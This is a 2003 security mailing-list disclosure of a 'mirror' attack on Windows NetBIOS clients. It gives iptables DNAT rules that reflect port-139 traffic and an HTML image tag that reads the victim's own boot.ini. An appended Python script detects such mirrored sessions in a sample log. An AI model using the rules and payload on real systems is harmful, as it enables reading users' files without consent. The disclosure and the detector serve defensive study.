Open Source and information security mailing list archives
Date: Fri, 10 Oct 2003 13:33:51 +0100
From: Joao Gouveia <tharbad@...tik.org>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: "Mirror" attacks on windows clients

Hi all,

Last night I was debugging a netbios connection between two machines and
I remembered something real simple and "stupid".
I can't recall reading anything on the subject but fact is I didn't
do any kind of research, so sorry if this is a known issue.

Mirroring Netbios connections from windows clients.

Lacking a better term, I'm calling this "mirror" because the idea is to
put a windows client talking Netbios with himself.

I've prepared a simple iptables based firewall on a linux box, so that,
with 10.10.10.1 being the firewall external interface and 10.10.10.2 the
windows client, these simple rules apply (may wrap):

-A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport 139 -j DNAT --to-destination 10.10.10.2:139
-A POSTROUTING -t nat -o eth0 -j MASQUERADE

Basically, what this does (obviously) is "mirror" the connections to
port 139 of the firewall from the windows client to that same port on
the windows client, causing it in fact to be talking Netbios with
himself.

The Netbios connection is established and authenticated successfully,
which allows me to sniff on the (unencrypted) traffic on the linux box.

So, if the user on the windows workstation visits a web page on my linux
box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini"> he
will in fact be reading his own "boot.ini", and will be able to read it
also by dumping the port 139 traffic on my firewall.

Now, this sounds really simple and "stupid", and of course there's a
strong possibility that I'm looking at this from a totally wrong
perspective, if so I am sorry, but doesn't this look like it allows me
to send a html mail to 10000 windows/outlook users and use this to read
arbitrary files on their workstations ( either by looking at the
traffic, or coding a simple program that parses the netbios traffic)?


Best regards,

Joao Gouveia
------------
tharbad@...tik.org
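A defender-side check for the pattern in the post above (an added example, not code from the post or its author): it scans a constructed connection log taken from the Windows client's point of view and flags two things, an outbound NetBIOS session answered within seconds by an inbound session from the same peer, which is exactly what the DNAT/MASQUERADE pair produces, and outbound NetBIOS to an address outside RFC 1918 space, which the HTML-mail variant relies on. The log format is an assumption, and port 445 is included beyond the post's 139.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

SMB_PORTS = {139, 445}          # the post only uses 139; 445 covers later clients
WINDOW = timedelta(seconds=5)   # both halves of a mirrored session are back-to-back
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log, assumed format (not from the post):
# timestamp direction remote_ip remote_port local_port
SAMPLE_LOG = """\
2003-10-10T13:30:00 OUT 10.10.10.1 139 1041
2003-10-10T13:30:00 IN 10.10.10.1 1041 139
2003-10-10T13:31:10 OUT 10.10.10.7 139 1042
2003-10-10T13:45:00 OUT 203.0.113.5 139 1043
"""

def parse(log):
    rows = []
    for line in log.splitlines():
        ts, direction, rip, rport, lport = line.split()
        rows.append((datetime.fromisoformat(ts), direction, rip, int(rport), int(lport)))
    return rows

def find_mirrors(rows):
    """Pair each outbound SMB session with an inbound SMB session from the same
    peer inside WINDOW; a real file server never dials the client back like this."""
    hits = []
    outbound = [r for r in rows if r[1] == "OUT" and r[3] in SMB_PORTS]
    inbound = [r for r in rows if r[1] == "IN" and r[4] in SMB_PORTS]
    for o in outbound:
        for i in inbound:
            if i[2] == o[2] and timedelta(0) <= i[0] - o[0] <= WINDOW:
                # strongest form: the inbound source port equals our own outbound
                # source port, i.e. the NAT box handed our SYN straight back to us
                exact = i[3] == o[4]
                hits.append((o[2], o[0].isoformat(), exact))
    return hits

def find_external_smb(rows):
    """Outbound SMB to a non-RFC1918 address: the egress rule that stops the
    HTML-mail variant, applied retrospectively to the log."""
    return [r[2] for r in rows if r[1] == "OUT" and r[3] in SMB_PORTS
            and not any(ip_address(r[2]) in n for n in RFC1918)]

if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    print("mirrored sessions:", find_mirrors(rows))
    print("external SMB:", find_external_smb(rows))
```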

